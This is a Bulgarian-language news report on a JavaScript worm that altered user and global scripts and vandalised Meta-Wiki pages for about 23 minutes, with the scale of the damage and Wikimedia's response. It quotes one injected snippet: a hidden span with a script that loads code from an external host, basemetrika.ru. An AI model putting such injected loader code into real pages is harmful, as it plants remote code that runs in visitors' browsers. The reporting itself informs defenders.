Атаката е засегнала Meta-Wiki и е била овладяна за около 23 минути
Wikimedia Foundation съобщи за инцидент със сигурността, след като саморазпространяващ се JavaScript „червей“ започна да променя потребителски скриптове и да извършва вандализъм в страниците на Meta-Wiki.
Редактори първо сигнализираха за проблема във форума Village Pump на Wikipedia, след като забелязаха масови автоматизирани редакции, които добавят скрити скриптове и променят случайни страници.
Инженерите на Wikimedia временно ограничиха редактирането в проектите, докато разследваха инцидента и започнаха да връщат промените.
Как е започнал инцидентът
Според системата за проследяване на проблеми Phabricator, атаката вероятно е започнала след изпълнение на злонамерен скрипт, хостван в руската версия на Wikipedia.
Скриптът е бил запазен на страница:
User:Ololoshka562/test.js
Файлът е качен през март 2024 г. и се предполага, че е свързан със скриптове, използвани при предишни атаки срещу уики проекти.
Анализ на BleepingComputer показва, че скриптът вероятно е бил стартиран за първи път от акаунт на служител на Wikimedia, докато се е тествала функционалността за потребителски скриптове.
Все още не е ясно дали:
-
скриптът е бил изпълнен умишлено
-
зареден случайно по време на тестове
-
или акаунтът е бил компрометиран
Как работи JavaScript „червеят“
Злонамереният код се саморазпространява, като инжектира JavaScript „loader“ в два различни скрипта:
1. Потребителско ниво
Червеят се опитва да презапише файла:
Така при всяко влизане на потребителя в сайта скриптът автоматично зарежда злонамерения код.
2. Глобално ниво
Ако заразеният потребител има достатъчно права, скриптът променя и:
Това е глобален JavaScript файл, използван от всички редактори.
Ако той бъде заразен, всеки потребител, който зареди страницата, активира червея, който след това повтаря същите действия.
Вандализъм на страници
Скриптът е включвал и функция за автоматична редакция на случайни страници чрез командата:
След това в страницата се добавя изображение и скрит JavaScript код, който зарежда допълнителен скрипт от външен сайт.
Примерният код включва:
<span style=“display:none“>
<script>$.getScript(‘//basemetrika.ru/…’)</script>
</span>
Мащабът на инцидента
Анализът на BleepingComputer показва, че:
-
около 3 996 страници са били променени
-
85 потребителски скрипта (common.js) са били заменени
-
неизвестен брой страници са били изтрити
По време на почистването служители на Wikimedia Foundation са върнали оригиналните версии на засегнатите скриптове и са премахнали злонамерения код.
Много от променените страници са били потиснати (suppressed) и вече не се виждат в публичната история на редакциите.
Официална позиция на Wikimedia
По-късно Wikimedia Foundation уточни, че кодът е бил активен само 23 минути.
По време на този период:
-
е било променено и изтрито съдържание само в Meta-Wiki
-
съдържанието вече се възстановява
Фондацията заяви още:
-
няма доказателства за външна атака срещу Wikipedia
-
няма изтичане на лични данни
Инцидентът е възникнал, след като по време на преглед на потребителски код служители случайно са активирали скрит злонамерен скрипт.
Следващи мерки
Wikimedia Foundation съобщи, че работи върху допълнителни мерки за сигурност, които да намалят риска подобни инциденти да се случват в бъдеще.
Фондацията ще публикува и подробен доклад за инцидента, след като разследването приключи.
